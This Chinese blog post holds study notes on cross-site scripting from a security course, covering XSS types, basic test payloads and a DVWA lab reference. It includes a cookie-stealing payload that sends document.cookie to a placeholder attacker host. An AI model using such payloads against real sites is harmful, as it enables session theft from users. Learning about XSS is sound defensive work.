web安全-5-XSS漏洞

笔记是根据马士兵教育2024HVV专题编写,作为学习记录来分享,如有错误的地方请指正,谢谢

免责声明
本文仅限于学习讨论与技术知识的分享,不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任,一旦造成后果请自行承担!

1、XSS漏洞介绍

XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端
脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问
Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而
达到攻击的目的。

XSS分类一般如下:
1、反射型XSS
2、存储型XSS
3、DOM型XSS

简单来说,在网页中的注入点,如果注入恶意代码可以执行js那就是存在xss漏洞,比如在搜索框中输入这个弹窗payload:
alert(1) //弹出1
alert(document.cookie) //弹出当前cookie
document.location = ‘http://www.baidu.com’
有弹窗或者跳转显示就是存在xss

1.1、反射型XSS介绍(低危)

反射型XSS,也称为非持久性XSS,是最常见的一种XSS
在这里插入图片描述

1.2、存储型XSS介绍(高危)

在这里插入图片描述

1.3、DOM型XSS介绍

DOM型XSS,其实也是一种反射型,但是输入的语句不是JS的语句,是DOM语法
在这里插入图片描述

2、利用XSS漏洞如何实行攻击呢?

2.1、攻击逻辑

在这里插入图片描述

2.2、例子

举例:
黑客注入恶意js:

document.location = 'http://www.xxx.com/cookie.php cookie='+document.cookie;

客户去访问页面的时候,服务器也访问了这段恶意代码

document.location = 'http://www.xxx.com/cookie.php?cookie='+document.cookie;

黑客登录www.xxx.com的网站就可以查看用户返回的COOKIE信息

3、具体XSS靶场

我使用dvwa靶场做了详细的渗透,具体你们可以去看我那个文件xss_dvwa

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值